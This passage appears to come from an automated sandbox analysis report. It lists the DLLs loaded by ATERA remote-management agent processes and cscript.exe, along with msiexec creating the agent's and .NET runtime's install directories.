                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wscapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: devobj.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: napinsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: pnrpnsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wshbth.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: nlaapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winrnr.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: version.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: cryptnet.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: winnsi.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\System32\cscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile written: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA NetworksJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgentJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.configJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\sharedJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.AppJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebHeaderCollection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-fibers-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Buffers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Expressions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-errorhandling-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-multibyte-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-time-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Specialized.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Reader.dllJump to behavior
